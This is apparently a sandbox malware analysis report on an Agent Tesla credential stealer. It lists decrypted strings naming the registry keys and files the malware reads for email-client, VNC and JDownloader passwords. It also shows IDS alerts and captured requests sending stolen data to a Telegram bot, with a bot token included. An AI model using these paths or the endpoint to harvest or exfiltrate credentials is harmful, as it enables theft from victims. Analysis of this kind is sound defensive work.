Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Becky!
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: DataDir
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Folder.lst
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Mailbox.ini
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Account
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: PassWd
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Account
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SMTPServer
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Account
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: MailAddress
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Becky!
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Outlook
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Email
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: IMAP Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: POP3 Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: HTTP Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SMTP Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Email
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Email
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Email
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: IMAP Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: POP3 Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: HTTP Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SMTP Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Server
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Windows Mail App
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Email
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Server
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SchemaId
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: pResourceElement
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: pIdentityElement
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: pPackageSid
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: syncpassword
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: mailoutgoing
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: FoxMail
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Executable
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: FoxmailPath
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Storage\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Storage\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \mail
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \mail
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Account.stg
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Account.stg
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: POP3Host
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SMTPHost
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: IncomingServer
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Account
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: MailAddress
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: POP3Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Opera Mail
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: opera:
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: PocoMail
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: appdata
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Pocomail\accounts.ini
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Email
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: POPPass
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SMTPPass
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SMTP
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: eM Client
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: eM Client\accounts.dat
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: eM Client
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Accounts
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: "Username":"
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: "Secret":"
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: "ProviderName":"
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: o6806642kbM7c5
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Mailbird
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SenderIdentities
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Accounts
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Mailbird\Store\Store.db
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Server_Host
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Accounts
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Email
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Username
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: EncryptedPassword
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Mailbird
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: RealVNC 4.x
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: RealVNC 3.x
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SOFTWARE\RealVNC\vncserver
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: RealVNC 4.x
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: RealVNC 3.x
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\ORL\WinVNC3
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: TightVNC
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: TightVNC
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: PasswordViewOnly
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: TightVNC ControlPassword
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ControlPassword
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: TigerVNC
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\TigerVNC\Server
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: UltraVNC
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: passwd
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: UltraVNC
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: passwd2
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: UltraVNC
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: passwd
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: UltraVNC
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: passwd2
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: UltraVNC
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: passwd
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: UltraVNC
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: passwd2
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: UltraVNC
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: passwd
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: UltraVNC
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: passwd2
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: JDownloader 2.0
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: JDownloader 2.0\cfg
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: JDownloader 2.0\cfg

Source: IUqsn1SBGy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50001 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50003 version: TLS 1.2

Source: IUqsn1SBGy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49713 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49710 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49713 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.5:49710 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49710 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49710
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49713
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49751 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.5:49751 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49798 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.5:49798 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49798 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49798
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49758 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49758 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49758
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49751 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49751
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49997 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49993 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50004 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50005 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49997 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50012 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50014 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50007 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50005 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49995 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50006 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50004 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50001 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49996 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49993 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50014 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50012 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50006 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50008 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49995 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50009 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50007 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49807 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49996 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49807 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50008 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50001 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49807
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50009 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49994 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50010 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50013 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.5:49994 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49994 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49998 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49999 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50010 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50013 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49999 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49998 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50003 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49992 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50003 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49992 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50011 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50011 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49994

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd31650ef647f0Host: api.telegram.orgContent-Length: 971Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd3177332952c3Host: api.telegram.orgContent-Length: 4052Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd316516cd8193Host: api.telegram.orgContent-Length: 971Expect: 100-continueConnection: Keep-Alive
